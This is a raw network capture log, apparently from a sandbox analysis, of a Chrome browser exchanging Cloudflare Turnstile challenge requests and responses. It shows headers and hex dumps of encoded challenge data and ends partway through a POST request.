                                                                                                                                                                                                                                  2024-12-18 19:27:56 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f418d689add32ca/1734550072811/ws77LC-Zvt6wd3o HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:57 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:57 GMT
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d9d79738c1b-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 3a 08 02 00 00 00 e9 e8 34 79 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR:4yIDAT$IENDB`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  16192.168.2.1649726104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:57 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f418d689add32ca/1734550072814/43f2e9d347adfa999698c3de808376dcbbeb8fdd81c9d20ed7f152aa5925d797/m_5diggWAVh3NiI HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:57 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:57 GMT
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                  Content-Length: 1
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-18 19:27:57 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 51 5f 4c 70 30 30 65 74 2d 70 6d 57 6d 4d 50 65 67 49 4e 32 33 4c 76 72 6a 39 32 42 79 64 49 4f 31 5f 46 53 71 6c 6b 6c 31 35 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gQ_Lp00et-pmWmMPegIN23Lvrj92BydIO1_FSqlkl15cAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                  2024-12-18 19:27:57 UTC1INData Raw: 4a
                                                                                                                                                                                                                                  Data Ascii: J


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  17192.168.2.1649727104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 31379
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  CF-Challenge: sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC16384OUTData Raw: 76 5f 38 66 34 31 38 64 36 38 39 61 64 64 33 32 63 61 3d 6c 6e 78 68 65 35 2d 77 4c 37 6e 2d 4c 5a 77 2d 59 38 72 38 6a 5a 34 38 65 31 2d 46 38 6d 58 68 78 41 68 38 43 38 51 68 48 56 78 38 58 4e 38 50 68 6c 78 38 4a 78 38 6c 35 38 4d 31 47 6b 58 35 34 61 34 38 34 42 38 41 57 4b 47 68 38 47 68 2d 39 38 4e 68 34 39 38 70 41 70 6d 4a 47 38 37 49 2d 67 38 59 49 2d 39 70 39 38 6b 47 38 6b 2d 56 51 6e 38 35 61 39 6c 49 38 50 2d 36 6f 67 38 42 54 74 6d 44 4c 78 47 24 38 6b 67 78 5a 35 78 38 51 38 4d 39 38 5a 6d 38 73 35 49 2d 73 38 78 35 4f 38 35 77 38 62 70 65 41 77 4e 58 47 25 32 62 48 47 4f 4a 4e 35 6d 61 78 53 46 38 37 39 6e 68 4d 7a 70 5a 6b 68 31 38 38 62 66 78 31 34 6e 31 6d 38 50 2d 57 4c 4f 69 78 66 35 61 6a 4e 38 71 4a 63 67 61 4a 51 37 66 79 72 42 4c
                                                                                                                                                                                                                                  Data Ascii: v_8f418d689add32ca=lnxhe5-wL7n-LZw-Y8r8jZ48e1-F8mXhxAh8C8QhHVx8XN8Phlx8Jx8l58M1GkX54a484B8AWKGh8Gh-98Nh498pApmJG87I-g8YI-9p98kG8k-VQn85a9lI8P-6og8BTtmDLxG$8kgxZ5x8Q8M98Zm8s5I-s8x5O85w8bpeAwNXG%2bHGOJN5maxSF879nhMzpZkh188bfx14n1m8P-WLOixf5ajN8qJcgaJQ7fyrBL
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC14995OUTData Raw: 77 4e 76 54 7a 48 41 34 54 2d 57 6e 77 6d 75 75 66 58 31 35 38 68 63 47 36 78 38 4e 78 38 38 35 2b 48 35 69 68 35 42 6d 33 47 2d 6e 35 4a 38 67 4c 4d 71 6b 39 38 43 6e 2d 42 68 39 38 78 68 78 38 4d 38 2d 76 4c 5a 38 35 6d 38 58 38 4e 68 6b 64 38 78 38 69 4e 2d 78 38 2b 38 78 4d 35 4a 38 6d 77 5a 49 35 6e 38 6c 38 78 4d 35 74 68 73 38 48 64 4e 42 38 45 38 31 68 35 58 38 64 52 6b 78 38 4e 38 33 68 4e 4c 38 77 38 37 68 6b 4c 38 48 68 37 34 37 47 35 59 38 24 68 4d 47 38 77 38 4e 24 69 68 2d 78 4e 67 61 4d 38 34 79 38 7a 58 61 68 6b 39 7a 53 69 55 6d 34 58 38 48 51 6b 7a 2d 6e 49 57 38 67 62 63 58 2d 78 38 39 6d 2d 6d 38 4d 4c 5a 49 2d 49 38 78 68 67 47 50 6d 4c 55 38 48 6e 6b 4a 6d 39 77 6b 4a 78 42 38 67 4c 38 45 44 63 2d 39 7a 6c 78 4d 4d 38 4a 38 34 6e 38
                                                                                                                                                                                                                                  Data Ascii: wNvTzHA4T-WnwmuufX158hcG6x8Nx885+H5ih5Bm3G-n5J8gLMqk98Cn-Bh98xhx8M8-vLZ85m8X8Nhkd8x8iN-x8+8xM5J8mwZI5n8l8xM5ths8HdNB8E81h5X8dRkx8N83hNL8w87hkL8Hh747G5Y8$hMG8w8N$ih-xNgaM84y8zXahk9zSiUm4X8HQkz-nIW8gbcX-x89m-m8MLZI-I8xhgGPmLU8HnkJm9wkJxB8gL8EDc-9zlxMM8J84n8
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:59 GMT
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 26316
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cf-chl-gen: CplFFkyHGyOTo55PGoww8w5/KMPQ4zkAPWM74fHPwCYamsTKpwcX74DuAzK/Axwyr3tVDSxmFjJhyX7d$zopEagQ01Qp4Sr4S
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418dac2c6942e7-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1039INData Raw: 62 56 53 48 5a 48 5a 56 68 47 32 50 57 6e 35 33 6a 5a 57 50 6c 6e 42 6a 6b 49 65 71 70 56 36 4c 72 71 6c 2f 66 71 57 74 6e 48 47 7a 6a 32 35 34 6c 6e 4b 52 68 34 2b 5a 6c 4b 47 52 77 71 57 6b 68 71 54 44 6c 70 6d 6b 72 4c 57 68 6d 4b 69 37 6e 39 4f 4d 77 73 66 54 72 74 66 54 6d 4a 6e 57 30 4a 65 72 31 75 48 6a 33 36 48 4f 6f 4d 6e 6b 78 72 57 73 78 61 32 73 75 76 4c 6e 36 2b 44 54 35 65 54 6c 32 75 62 37 36 75 6e 4d 37 2f 50 4a 7a 62 32 36 39 66 51 48 78 77 72 6a 31 75 6a 71 36 4e 73 51 33 65 30 46 37 4d 30 47 31 42 54 73 2b 4e 55 52 35 51 63 56 32 4f 41 66 44 53 48 58 39 50 41 63 4b 76 6e 64 35 76 63 46 48 53 45 68 2f 4f 55 66 44 41 41 58 4c 69 55 35 48 53 30 5a 4d 52 48 35 4c 6a 55 44 51 53 55 36 51 45 6f 72 4b 6b 67 70 51 54 77 72 45 43 30 6f 4c 52 4d
                                                                                                                                                                                                                                  Data Ascii: bVSHZHZVhG2PWn53jZWPlnBjkIeqpV6Lrql/fqWtnHGzj254lnKRh4+ZlKGRwqWkhqTDlpmkrLWhmKi7n9OMwsfTrtfTmJnW0Jer1uHj36HOoMnkxrWsxa2suvLn6+DT5eTl2ub76unM7/PJzb269fQHxwrj1ujq6NsQ3e0F7M0G1BTs+NUR5QcV2OAfDSHX9PAcKvnd5vcFHSEh/OUfDAAXLiU5HS0ZMRH5LjUDQSU6QEorKkgpQTwrEC0oLRM
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1369INData Raw: 55 6e 47 4e 6b 6c 36 46 6e 67 61 53 69 69 49 31 6e 63 4c 47 70 71 34 6d 6e 69 37 65 68 70 6e 65 37 75 35 4b 70 6c 6e 6d 34 6f 4a 75 53 6b 35 75 7a 6f 63 61 2f 72 63 6d 59 6a 37 76 47 6d 73 65 51 30 4e 4b 31 74 74 53 55 7a 63 79 33 79 37 2b 30 6e 4e 66 68 77 71 4f 31 75 38 69 34 35 4d 43 34 6e 38 75 39 79 64 47 70 35 2f 47 72 7a 63 2f 46 73 76 57 32 35 64 34 41 2b 72 76 30 30 77 58 78 7a 74 4d 45 41 66 66 6c 31 2b 54 71 44 2b 34 44 2b 2b 37 67 36 67 66 78 30 67 62 74 2b 42 50 6c 30 78 48 39 43 2f 6b 58 45 69 45 67 45 69 41 6e 2f 41 73 47 2f 75 6f 62 39 7a 49 67 36 53 34 4c 48 67 58 31 45 4f 76 31 44 44 41 30 2b 53 6b 76 2f 68 38 75 51 44 73 65 41 43 45 31 4f 53 51 32 4f 43 51 70 51 30 78 51 54 30 6f 4e 51 45 59 31 51 6b 6b 70 4a 6b 63 37 47 6b 34 63 58 55
                                                                                                                                                                                                                                  Data Ascii: UnGNkl6FngaSiiI1ncLGpq4mni7ehpne7u5Kplnm4oJuSk5uzoca/rcmYj7vGmseQ0NK1ttSUzcy3y7+0nNfhwqO1u8i45MC4n8u9ydGp5/Grzc/FsvW25d4A+rv00wXxztMEAffl1+TqD+4D++7g6gfx0gbt+BPl0xH9C/kXEiEgEiAn/AsG/uob9zIg6S4LHgX1EOv1DDA0+Skv/h8uQDseACE1OSQ2OCQpQ0xQT0oNQEY1QkkpJkc7Gk4cXU
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1369INData Raw: 6c 70 53 4f 61 35 71 46 72 6f 64 72 73 6e 47 55 6b 58 5a 77 6b 5a 57 49 73 36 6d 35 6a 36 7a 42 73 62 32 33 6b 62 4b 38 74 70 6e 47 79 37 65 65 68 37 69 37 69 49 58 44 6a 59 32 50 70 61 75 36 78 39 61 71 6e 73 72 68 30 63 4b 69 77 4e 33 58 73 64 36 33 35 4f 4c 68 7a 64 6a 6b 33 37 7a 45 78 4f 6e 51 79 50 53 71 74 63 2f 30 2b 4e 43 30 39 4e 33 41 75 50 44 75 38 51 66 44 33 4f 4d 4d 36 73 4c 58 2b 75 37 48 32 68 4d 56 35 38 34 56 38 2b 44 69 47 52 30 53 35 68 48 52 41 68 30 4c 48 41 54 38 39 79 4c 31 34 69 59 56 43 75 73 45 43 78 44 78 38 68 51 69 4c 69 45 57 47 6a 48 31 50 54 59 36 45 55 41 71 4e 67 41 73 4c 69 39 49 4f 69 59 6c 4a 44 30 32 51 53 55 6b 50 6b 74 42 49 55 39 48 4c 45 6f 36 52 54 6b 36 46 31 6b 71 57 54 30 73 59 44 49 58 55 30 67 38 59 43 56
                                                                                                                                                                                                                                  Data Ascii: lpSOa5qFrodrsnGUkXZwkZWIs6m5j6zBsb23kbK8tpnGy7eeh7i7iIXDjY2Ppau6x9aqnsrh0cKiwN3Xsd635OLhzdjk37zExOnQyPSqtc/0+NC09N3AuPDu8QfD3OMM6sLX+u7H2hMV584V8+DiGR0S5hHRAh0LHAT89yL14iYVCusECxDx8hQiLiEWGjH1PTY6EUAqNgAsLi9IOiYlJD02QSUkPktBIU9HLEo6RTk6F1kqWT0sYDIXU0g8YCV
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1369INData Raw: 34 32 63 6a 32 75 71 67 49 70 30 69 58 71 59 73 62 43 71 76 4c 79 4c 72 34 79 69 77 35 57 34 6f 35 7a 4d 69 37 2b 2f 76 59 76 41 78 4e 43 4f 6b 62 54 44 7a 4d 61 61 70 4d 6e 53 6d 63 75 2b 75 35 72 66 73 64 61 32 30 37 37 57 79 72 6a 44 77 73 2f 44 78 4b 33 64 7a 75 57 76 79 2b 6a 6c 73 4e 44 61 32 50 37 6e 73 62 72 63 2b 76 58 4f 32 2b 62 46 41 41 50 42 43 63 6e 31 42 66 6e 6a 33 2f 7a 4e 41 76 54 6a 45 41 73 4a 35 66 66 75 36 76 77 4b 45 2b 6e 73 32 68 67 6a 47 42 55 58 2b 68 4d 66 35 78 67 75 47 77 30 75 42 76 34 73 4c 76 4d 4d 4b 44 45 6f 4d 4f 34 4f 4b 67 67 67 48 68 4d 6b 2f 44 4d 56 49 54 6f 63 4a 68 38 75 51 51 34 2f 42 79 31 54 45 46 41 6c 46 78 5a 61 57 42 70 63 47 79 67 31 55 68 74 4c 4f 46 35 58 4d 54 30 35 4b 44 64 6e 61 32 34 38 4f 43 34 38
                                                                                                                                                                                                                                  Data Ascii: 42cj2uqgIp0iXqYsbCqvLyLr4yiw5W4o5zMi7+/vYvAxNCOkbTDzMaapMnSmcu+u5rfsda2077WyrjDws/DxK3dzuWvy+jlsNDa2P7nsbrc+vXO2+bFAAPBCcn1Bfnj3/zNAvTjEAsJ5ffu6vwKE+ns2hgjGBUX+hMf5xguGw0uBv4sLvMMKDEoMO4OKgggHhMk/DMVITocJh8uQQ4/By1TEFAlFxZaWBpcGyg1UhtLOF5XMT05KDdna248OC48
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1369INData Raw: 36 35 6a 58 4a 33 65 70 69 73 66 36 6e 44 77 61 47 5a 68 5a 2b 6b 67 70 2b 66 6e 4b 79 46 6e 38 75 66 6e 4a 4b 39 6f 63 61 57 73 4b 69 6a 72 38 69 72 70 72 65 63 30 38 43 63 31 64 48 69 6d 61 58 66 70 37 33 55 76 75 7a 66 71 39 4b 71 38 37 2b 77 78 63 4c 49 39 37 72 72 30 38 76 4a 79 39 2b 7a 30 50 50 32 78 4d 44 53 39 74 58 35 34 4f 41 44 44 51 45 41 32 73 2f 76 7a 39 54 74 31 2f 6e 68 47 76 6e 34 47 52 6a 78 46 78 73 64 31 53 4d 6e 48 79 51 48 48 68 4d 64 2b 79 41 6e 2b 65 34 72 48 43 67 7a 4b 67 76 70 46 6a 4d 31 4f 50 4d 35 4e 2f 67 2f 4f 53 30 73 2f 45 59 45 48 78 74 4c 48 69 49 4c 53 43 45 4a 52 30 73 6d 52 46 52 53 46 43 6f 51 57 55 4e 45 4e 6c 70 41 4f 68 31 65 4e 52 31 42 58 54 6c 55 5a 47 55 39 51 7a 6c 75 5a 6d 41 71 62 47 73 78 4c 48 4a 4a 54
                                                                                                                                                                                                                                  Data Ascii: 65jXJ3episf6nDwaGZhZ+kgp+fnKyFn8ufnJK9ocaWsKijr8irprec08Cc1dHimaXfp73Uvuzfq9Kq87+wxcLI97rr08vJy9+z0PP2xMDS9tX54OADDQEA2s/vz9Tt1/nhGvn4GRjxFxsd1SMnHyQHHhMd+yAn+e4rHCgzKgvpFjM1OPM5N/g/OS0s/EYEHxtLHiILSCEJR0smRFRSFCoQWUNENlpAOh1eNR1BXTlUZGU9QzluZmAqbGsxLHJJT
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1369INData Raw: 2b 73 37 57 55 67 49 79 6d 66 35 53 77 71 4b 65 6c 74 36 71 73 6e 4c 71 77 78 35 79 39 73 63 71 6b 31 72 69 6e 78 72 72 52 6c 39 76 49 32 63 50 66 31 4e 76 4f 77 65 58 52 70 73 6e 4a 34 39 62 46 35 65 6d 76 71 2b 33 75 78 4e 58 59 38 76 44 45 38 64 33 62 39 75 76 65 30 37 76 68 35 65 4d 48 39 50 50 58 42 2b 62 74 37 64 6a 36 37 73 72 37 2f 51 77 50 45 41 67 44 30 78 67 59 46 77 66 39 44 42 6e 65 48 42 77 61 33 77 59 4a 49 79 48 30 49 67 34 4d 4a 78 77 50 42 4f 73 53 46 68 51 33 4a 53 51 49 4e 78 63 65 48 67 6b 72 48 2f 6f 73 4c 6a 77 76 46 6a 34 2f 4d 79 6f 2f 4e 77 68 4d 54 45 73 37 4a 6b 52 4b 54 68 68 4d 54 69 30 5a 4a 54 38 59 4c 55 6c 42 51 44 35 51 51 30 55 31 55 30 6c 67 4e 56 5a 4b 59 7a 31 76 55 55 42 66 55 32 6f 30 53 6d 68 79 4e 7a 56 32 64 45
                                                                                                                                                                                                                                  Data Ascii: +s7WUgIymf5SwqKelt6qsnLqwx5y9scqk1rinxrrRl9vI2cPf1NvOweXRpsnJ49bF5emvq+3uxNXY8vDE8d3b9uve07vh5eMH9PPXB+bt7dj67sr7/QwPEAgD0xgYFwf9DBneHBwa3wYJIyH0Ig4MJxwPBOsSFhQ3JSQINxceHgkrH/osLjwvFj4/Myo/NwhMTEs7JkRKThhMTi0ZJT8YLUlBQD5QQ0U1U0lgNVZKYz1vUUBfU2o0SmhyNzV2dE
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1369INData Raw: 72 72 2b 34 76 6f 65 64 76 38 58 47 74 38 44 4a 6a 35 33 47 79 35 4f 74 78 63 2f 53 30 39 58 55 78 72 33 54 31 39 71 35 32 4e 76 64 6d 64 66 66 34 73 58 65 34 36 75 39 34 2b 66 45 32 2b 58 71 73 38 58 74 38 50 4c 5a 39 50 54 32 33 66 48 33 31 4e 33 78 2b 2b 37 68 39 67 44 48 39 77 59 46 42 77 67 41 43 41 72 46 42 41 37 54 35 51 6f 51 37 50 45 4d 46 64 76 78 45 52 66 66 37 52 51 64 48 79 41 62 49 50 77 43 4a 69 54 72 42 68 34 6f 42 66 30 71 4c 53 38 53 4c 44 48 33 46 69 38 30 4e 76 45 76 4f 54 73 57 4f 44 77 45 4a 6a 31 43 43 42 34 2f 51 77 77 61 52 45 67 51 4b 6b 4e 4e 54 79 5a 53 55 42 68 49 53 6c 55 63 4e 6c 6c 5a 49 45 78 58 58 46 39 67 57 6d 4a 69 48 6c 78 6c 51 56 68 6d 61 46 73 2b 59 32 30 30 5a 47 5a 78 4f 45 5a 75 64 47 64 4f 63 33 6c 56 54 6e 70
                                                                                                                                                                                                                                  Data Ascii: rr+4voedv8XGt8DJj53Gy5Otxc/S09XUxr3T19q52Nvdmdff4sXe46u94+fE2+Xqs8Xt8PLZ9PT23fH31N3x++7h9gDH9wYFBwgACArFBA7T5QoQ7PEMFdvxERff7RQdHyAbIPwCJiTrBh4oBf0qLS8SLDH3Fi80NvEvOTsWODwEJj1CCB4/QwwaREgQKkNNTyZSUBhISlUcNllZIExXXF9gWmJiHlxlQVhmaFs+Y200ZGZxOEZudGdOc3lVTnp
                                                                                                                                                                                                                                  2024-12-18 19:27:59 UTC1369INData Raw: 73 48 46 6a 38 2f 42 6f 62 47 71 79 63 32 58 6b 73 6d 70 75 62 4c 52 31 5a 2b 67 32 74 65 39 30 64 4c 4f 6f 39 62 64 70 4b 54 5a 34 38 2f 6e 78 64 48 44 37 72 54 71 73 38 6e 6d 37 66 43 7a 36 76 47 34 75 4f 33 33 36 74 48 73 2b 73 48 64 42 65 6e 72 42 38 77 44 79 41 7a 74 2f 51 6e 4d 2f 51 48 6e 39 4e 59 4c 2b 52 54 35 43 65 38 59 43 52 66 63 33 43 45 54 48 75 66 61 49 79 44 64 47 68 76 72 36 2b 73 6e 37 43 51 78 46 68 67 7a 39 43 2f 30 50 43 55 7a 2b 44 51 39 4c 6a 6f 45 41 6a 38 38 52 44 59 32 43 41 67 45 51 77 6b 71 54 54 49 30 54 78 52 4c 45 69 35 42 51 31 41 6d 4c 56 51 61 48 56 31 43 52 46 38 63 57 79 45 79 4f 57 41 6d 4b 56 56 6a 4b 54 70 42 61 47 6b 78 63 56 5a 59 63 7a 64 76 4e 55 5a 4e 64 48 55 39 61 58 63 39 54 6c 56 38 5a 30 57 46 61 6d 79 48
                                                                                                                                                                                                                                  Data Ascii: sHFj8/BobGqyc2XksmpubLR1Z+g2te90dLOo9bdpKTZ48/nxdHD7rTqs8nm7fCz6vG4uO336tHs+sHdBenrB8wDyAzt/QnM/QHn9NYL+RT5Ce8YCRfc3CETHufaIyDdGhvr6+sn7CQxFhgz9C/0PCUz+DQ9LjoEAj88RDY2CAgEQwkqTTI0TxRLEi5BQ1AmLVQaHV1CRF8cWyEyOWAmKVVjKTpBaGkxcVZYczdvNUZNdHU9aXc9TlV8Z0WFamyH


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  18192.168.2.1649728104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:01 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:01 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:01 GMT
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  Content-Length: 7
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  cf-chl-out: kBiTr8yXtKXIGjiZXwpXl9pIK5D/P7w17EI=$DSmCvG44mHmr9Vyn
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418db9a8bcf5fa-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                  Data Ascii: invalid


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  19192.168.2.1649729104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:09 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qu HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 33781
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
